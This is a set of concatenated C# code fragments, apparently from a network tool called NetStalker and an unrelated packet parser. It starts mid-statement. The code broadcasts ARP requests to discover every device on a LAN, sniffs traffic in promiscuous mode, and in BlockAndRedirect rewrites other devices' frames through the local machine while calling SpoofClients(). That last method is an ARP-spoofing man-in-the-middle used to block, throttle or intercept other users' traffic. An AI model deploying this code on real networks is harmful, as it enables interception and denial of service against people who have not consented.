PhysicalAddress.Parse("00-00-00-00-00-00"), IPAddress.Parse(GetRootIp(myipaddress) + ipindex), capturedevice.MacAddress, myipaddress); EthernetPacket ethernetpacket = new EthernetPacket(capturedevice.MacAddress, PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"), EthernetPacketType.Arp); ethernetpacket.PayloadPacket = arprequestpacket; capturedevice.SendPacket(ethernetpacket); } } catch (Exception ex) { DebugOutputClass.Print(view, "Exception at GetClientList.GetAllClients() inside new Thread(()=>{}) while sending packets probably because old thread was still running while capturedevice was closed due to subsequent refresh [" + ex.Message + "]"); } }).Start(); #endregion #region Retrieving ARP packets floating around and finding out the senders' IP and MACs capturedevice.Filter = "arp"; RawCapture rawcapture = null; long scanduration = 5000; new Thread(() => { try { Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); while ((rawcapture = capturedevice.GetNextPacket()) != null && stopwatch.ElapsedMilliseconds <= scanduration) { Packet packet = Packet.ParsePacket(rawcapture.LinkLayerType, rawcapture.Data); ARPPacket arppacket = (ARPPacket)packet.Extract(typeof(ARPPacket)); if (!clientlist.ContainsKey(arppacket.SenderProtocolAddress) && arppacket.SenderProtocolAddress.ToString() != "0.0.0.0" && areCompatibleIPs(arppacket.SenderProtocolAddress, myipaddress)) { clientlist.Add(arppacket.SenderProtocolAddress, arppacket.SenderHardwareAddress); view.ListView1.Invoke(new Action(() => { view.ListView1.Items.Add(new ListViewItem(new string[] { clientlist.Count.ToString(), arppacket.SenderProtocolAddress.ToString(), GetMACString(arppacket.SenderHardwareAddress), "On", ApplicationSettingsClass.GetSavedClientNameFromMAC(GetMACString(arppacket.SenderHardwareAddress)) })); })); //Debug.Print("{0} @ {1}", arppacket.SenderProtocolAddress, arppacket.SenderHardwareAddress); } int percentageprogress = (int)((float)stopwatch.ElapsedMilliseconds / scanduration * 100); view.MainForm.Invoke(new Action(() => view.ToolStripStatusScan.Text = "Scanning " + percentageprogress + "%")); view.MainForm.Invoke(new Action(() => view.ToolStripProgressBarScan.Value = percentageprogress)); //Debug.Print(packet.ToString() + "\n"); } stopwatch.Stop(); view.MainForm.Invoke(new Action(() => view.ToolStripStatusScan.Text = clientlist.Count.ToString() + " device(s) found")); view.MainForm.Invoke(new Action(() => view.ToolStripProgressBarScan.Value = 100)); BackgroundScanStart(view, interfacefriendlyname); //start passive monitoring } catch (PcapException ex) { DebugOutputClass.Print(view, "PcapException @ GetClientList.GetAllClients() @ new Thread(()=>{}) while retrieving packets [" + ex.Message + "]"); view.MainForm.Invoke(new Action(() => view.ToolStripStatusScan.Text = "Refresh for scan")); view.MainForm.Invoke(new Action(() => view.ToolStripProgressBarScan.Value = 0)); } catch (Exception ex) { DebugOutputClass.Print(view, ex.Message); } }).Start(); #endregion }
public static void GetAllClients(IView view, string interfacefriendlyname) { #region initialization if (capturedevice != null) { try { capturedevice.StopCapture(); //stop previous capture capturedevice.Close(); //close previous instances StopFlag = true; GatewayCalled = false; capturedevice.OnPacketArrival += null; Main.checkboxcanbeclicked = false; StopTheLoadingBar(view); } catch (PcapException) { } } clientlist = new Dictionary <IPAddress, PhysicalAddress>(); #endregion CaptureDeviceList capturedevicelist = CaptureDeviceList.Instance; capturedevicelist.Refresh(); //crucial for reflection of any network changes capturedevice = (from devicex in capturedevicelist where ((SharpPcap.WinPcap.WinPcapDevice)devicex).Interface.FriendlyName == interfacefriendlyname select devicex).ToList()[0]; capturedevice.Open(DeviceMode.Promiscuous, 1000); //open device with 1000ms timeout capturedevice.Filter = "arp"; IPAddress myipaddress = IPAddress.Parse(NetStalker.Properties.Settings.Default.localip); Size = NetStalker.Properties.Settings.Default.NetSize; var Root = GetRoot(myipaddress, Size); if (string.IsNullOrEmpty(Root)) { try { view.MainForm.Invoke(new Action(() => view.StatusLabel.Text = "Network Error")); return; } catch (Exception) { } } #region Sending ARP requests to probe for all possible IP addresses on LAN new Thread(() => { try { if (Size == 1) { for (int ipindex = 1; ipindex <= 255; ipindex++) { ARPPacket arprequestpacket = new ARPPacket(ARPOperation.Request, PhysicalAddress.Parse("00-00-00-00-00-00"), IPAddress.Parse(Root + ipindex), capturedevice.MacAddress, myipaddress); EthernetPacket ethernetpacket = new EthernetPacket(capturedevice.MacAddress, PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"), EthernetPacketType.Arp); ethernetpacket.PayloadPacket = arprequestpacket; capturedevice.SendPacket(ethernetpacket); } } else if (Size == 2) { for (int i = 1; i <= 255; i++) { for (int j = 1; j <= 255; j++) { ARPPacket arprequestpacket = new ARPPacket(ARPOperation.Request, PhysicalAddress.Parse("00-00-00-00-00-00"), IPAddress.Parse(Root + i + '.' + j), capturedevice.MacAddress, myipaddress); EthernetPacket ethernetpacket = new EthernetPacket(capturedevice.MacAddress, PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"), EthernetPacketType.Arp); ethernetpacket.PayloadPacket = arprequestpacket; capturedevice.SendPacket(ethernetpacket); if (!GatewayCalled) { ARPPacket ArpForGateway = new ARPPacket(ARPOperation.Request, PhysicalAddress.Parse("00-00-00-00-00-00"), GatewayIP, capturedevice.MacAddress, myipaddress);//??? EthernetPacket EtherForGateway = new EthernetPacket(capturedevice.MacAddress, PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"), EthernetPacketType.Arp); EtherForGateway.PayloadPacket = ArpForGateway; capturedevice.SendPacket(EtherForGateway); GatewayCalled = true; } } } } else if (Size == 3) { if (MetroMessageBox.Show(view.MainForm, "The network you're scanning is very large, it will take approximately 20 hours before the scanner can find all the devices, proceed?", "Warning", MessageBoxButtons.YesNo, MessageBoxIcon.Warning) == DialogResult.Yes) { for (int i = 1; i <= 255; i++) { for (int j = 1; j <= 255; j++) { for (int k = 1; k <= 255; k++) { ARPPacket arprequestpacket = new ARPPacket(ARPOperation.Request, PhysicalAddress.Parse("00-00-00-00-00-00"), IPAddress.Parse(Root + i + '.' + j + '.' + k), capturedevice.MacAddress, myipaddress); EthernetPacket ethernetpacket = new EthernetPacket(capturedevice.MacAddress, PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"), EthernetPacketType.Arp); ethernetpacket.PayloadPacket = arprequestpacket; capturedevice.SendPacket(ethernetpacket); if (!GatewayCalled) { ARPPacket ArpForGateway = new ARPPacket(ARPOperation.Request, PhysicalAddress.Parse("00-00-00-00-00-00"), GatewayIP, capturedevice.MacAddress, myipaddress); //??? EthernetPacket EtherForGateway = new EthernetPacket(capturedevice.MacAddress, PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"), EthernetPacketType.Arp); //??? EtherForGateway.PayloadPacket = ArpForGateway; capturedevice.SendPacket(EtherForGateway); GatewayCalled = true; } } } } } else { return; } } } catch (Exception) { } }).Start(); #endregion #region Retrieving ARP packets floating around and finding out the senders' IP and MACs capturedevice.Filter = "arp"; RawCapture rawcapture = null; long scanduration = 8000; new Thread(() => { try { Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); while ((rawcapture = capturedevice.GetNextPacket()) != null && stopwatch.ElapsedMilliseconds <= scanduration) { Packet packet = Packet.ParsePacket(rawcapture.LinkLayerType, rawcapture.Data); ARPPacket arppacket = (ARPPacket)packet.Extract(typeof(ARPPacket)); if (!clientlist.ContainsKey(arppacket.SenderProtocolAddress) && arppacket.SenderProtocolAddress.ToString() != "0.0.0.0" && areCompatibleIPs(arppacket.SenderProtocolAddress, myipaddress, Size)) { clientlist.Add(arppacket.SenderProtocolAddress, arppacket.SenderHardwareAddress); view.ListView1.Invoke(new Action(() => { string mac = GetMACString(arppacket.SenderHardwareAddress); int id = clientlist.Count - 1; string ip = arppacket.SenderProtocolAddress.ToString(); var obj = new Device(); new Thread(() => { try { ipp = ip; IPHostEntry hostEntry = Dns.GetHostEntry(ip); view.ListView1.BeginInvoke(new Action(() => { obj.DeviceName = hostEntry.HostName; view.ListView1.UpdateObject(obj); })); } catch (Exception) { try { view.ListView1.BeginInvoke(new Action(() => { obj.DeviceName = ip; view.ListView1.UpdateObject(obj); })); } catch (Exception) { } } }).Start(); new Thread(() => { try { var Name = VendorAPI.GetVendorInfo(mac); if (Name != null) { obj.ManName = Name.data.organization_name; } else { obj.ManName = ""; } view.ListView1.UpdateObject(obj); } catch (Exception) { } }).Start(); obj.IP = arppacket.SenderProtocolAddress; obj.MAC = PhysicalAddress.Parse(mac.Replace(":", "")); obj.DeviceName = "Resolving"; obj.ManName = "Getting information..."; obj.DeviceStatus = "Online"; view.ListView1.AddObject(obj); })); } int percentageprogress = (int)((float)stopwatch.ElapsedMilliseconds / scanduration * 100); view.MainForm.Invoke(new Action(() => view.StatusLabel.Text = "Scanning " + percentageprogress + "%")); } stopwatch.Stop(); Main.operationinprogress = false; view.MainForm.Invoke(new Action(() => view.StatusLabel.Text = clientlist.Count.ToString() + " device(s) found")); capturedevice.Close(); capturedevice = null; BackgroundScanStart(view, interfacefriendlyname); //start passive monitoring } catch (Exception) { try { view.MainForm.Invoke(new Action(() => view.StatusLabel.Text = "Error occurred")); } catch (Exception) { } } }).Start(); #endregion }
private ICaptureDevice HandlPacket(ICaptureDevice device) { RawCapture rawCapture = null; Controller control = Controller.getInstance(); var number = 0; while ((number != numberOfProtocols)) { rawCapture = device.GetNextPacket(); //Count the time if (rawCapture == null) { break; } ++number; var time = rawCapture.Timeval.Date; startTime = (isParse ? startTime : time); isParse = true; TimeSpan istime = time - startTime; var len = rawCapture.Data.Length; //Open containter LightInject var container = Registor.getInstance().Get(); Packet packet = Packet.ParsePacket(rawCapture.LinkLayerType, rawCapture.Data); var udpPacket = packet.Extract <UdpPacket>(); if (udpPacket != null) { var udp = container.GetInstance <IProtocol>("UDP"); control.Add(udp.Parsing(packet, istime, len)); continue; } var tcpPacket = packet.Extract <TcpPacket>(); if (tcpPacket != null) { if (Encoding.UTF8.GetString(tcpPacket.PayloadData).IndexOf("HTTP/1.1") >= 0) { var http = container.GetInstance <IProtocol>("HTTP"); control.Add(http.Parsing(tcpPacket, istime, len)); continue; } var tcp = container.GetInstance <IProtocol>("TCP"); control.Add(tcp.Parsing(tcpPacket, istime, len)); continue; } var icmpPacketv6 = packet.Extract <PacketDotNet.IcmpV6Packet>(); var icmpPacket = packet.Extract <IcmpV4Packet>(); if (icmpPacket != null || icmpPacketv6 != null) { var icmp = container.GetInstance <IProtocol>("ICMP"); control.Add(icmp.Parsing(packet, istime, len)); continue; } var ethernetPacket = packet.Extract <EthernetPacket>(); if (ethernetPacket != null) { var ethernet = container.GetInstance <IProtocol>("Ethernet"); control.Add(ethernet.Parsing(ethernetPacket, istime, len)); continue; } } return(device); }
/// <summary> /// This is the main method for blocking and redirection of targeted devices. /// </summary> public static void BlockAndRedirect() { if (!BRMainSwitch) { throw new InvalidOperationException("\"BRMainSwitch\" must be set to \"True\" in order to activate the BR"); } if (string.IsNullOrEmpty(Properties.Settings.Default.GatewayMac)) { Properties.Settings.Default.GatewayMac = Main.Devices.Where(d => d.Key.Equals(AppConfiguration.GatewayIp)).Select(d => d.Value.MAC).FirstOrDefault().ToString(); Properties.Settings.Default.Save(); } if (MainDevice == null) { MainDevice = CaptureDeviceList.New()[AppConfiguration.AdapterName]; } MainDevice.Open(DeviceMode.Promiscuous, 1000); MainDevice.Filter = "ip"; BRTask = Task.Run(() => { RawCapture rawCapture; EthernetPacket packet; while (BRMainSwitch) { if ((rawCapture = MainDevice.GetNextPacket()) != null) { packet = Packet.ParsePacket(rawCapture.LinkLayerType, rawCapture.Data) as EthernetPacket; if (packet == null) { continue; } Device device; if ((device = Main.Devices.FirstOrDefault(D => D.Value.MAC.Equals(packet.SourceHardwareAddress)).Value) != null && device.Redirected && !device.IsLocalDevice && !device.IsGateway) { if (device.UploadCap == 0 || device.UploadCap > device.PacketsSentSinceLastReset) { packet.SourceHardwareAddress = MainDevice.MacAddress; packet.DestinationHardwareAddress = AppConfiguration.GatewayMac; MainDevice.SendPacket(packet); device.PacketsSentSinceLastReset += packet.Bytes.Length; } } else if (packet.SourceHardwareAddress.Equals(AppConfiguration.GatewayMac)) { IPv4Packet IPV4 = packet.Extract <IPv4Packet>(); if (Main.Devices.TryGetValue(IPV4.DestinationAddress, out device) && device.Redirected && !device.IsLocalDevice && !device.IsGateway) { if (device.DownloadCap == 0 || device.DownloadCap > device.PacketsReceivedSinceLastReset) { packet.SourceHardwareAddress = MainDevice.MacAddress; packet.DestinationHardwareAddress = device.MAC; MainDevice.SendPacket(packet); device.PacketsReceivedSinceLastReset += packet.Bytes.Length; } } } } SpoofClients(); } }); }